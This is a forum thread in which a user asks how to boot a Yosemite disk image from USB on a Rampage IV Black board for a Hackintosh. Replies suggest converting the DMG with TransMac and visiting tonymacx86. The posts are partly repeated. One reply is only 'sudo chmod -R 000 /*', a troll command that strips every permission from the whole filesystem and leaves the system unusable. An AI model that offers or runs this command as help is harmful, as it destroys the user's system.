Installing Yosemite10.3_dmg by USB on a Rampage IV Black,Help!

Thus far I have Yosemite(10.10.3).dmg  onto my USB, ready to be boot, But I can't manage to make that happen!

Here's are the options I fiddled with and I assure that I've almost disabled and enabled all of them...

On the Boot tab,
I changed UEFI to legacy then both then auto and  then to disabled....> None worked.
 I've also disabled fast boot....

I've changed CMS settings to Auto , enabled then disabled..> nothing!

Of course I have changed boot priority to the USB  still nothing...

I don't know what do to to get this boot, How can I shoot this and could you guys please help!

Thank you!

DMGs arent bootable, son. You'll need to open it in Disk Utility or AutoDMG or LionDiskMaker on OSX and transfer the bootable image to a USB. If you're using Windows, theres Transmac but thats paid software (15 days trial AFAIK) so you'll have to use that. Gluck

DMGs arent bootable, son. You'll need to open it in Disk Utility or AutoDMG or LionDiskMaker on OSX and transfer the bootable image to a USB. If you're using Windows, theres Transmac but thats paid software (15 days trial AFAIK) so you'll have to use that. Gluck

this^^^

coming in to tell you @Sibel_X to please follow your topics ;) welcome to the forum!

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Thus far I have Yosemite(10.10.3).dmg  onto my USB, ready to be boot, But I can't manage to make that happen!

Here's are the options I fiddled with and I assure that I've almost disabled and enabled all of them...

On the Boot tab,

I changed UEFI to legacy then both then auto and  then to disabled....> None worked.

I've also disabled fast boot....

I've changed CMS settings to Auto , enabled then disabled..> nothing!

Of course I have changed boot priority to the USB  still nothing...

I don't know what do to to get this boot, How can I shoot this and could you guys please help!

Thank you!

seems like your trying to dual boot windows and mac os

id recommend you check out tonymacx86

there a dedicated site to what your trying to do

the advice there is prob doing to be better for this topic

oh and follow your topics

@Funkatronic

I used Trnasmac to turn my usb into an osx bootable device, but I can't boot it !
even when I install directly to my motherboard it thinks I'm on OC panel module, what do I do ?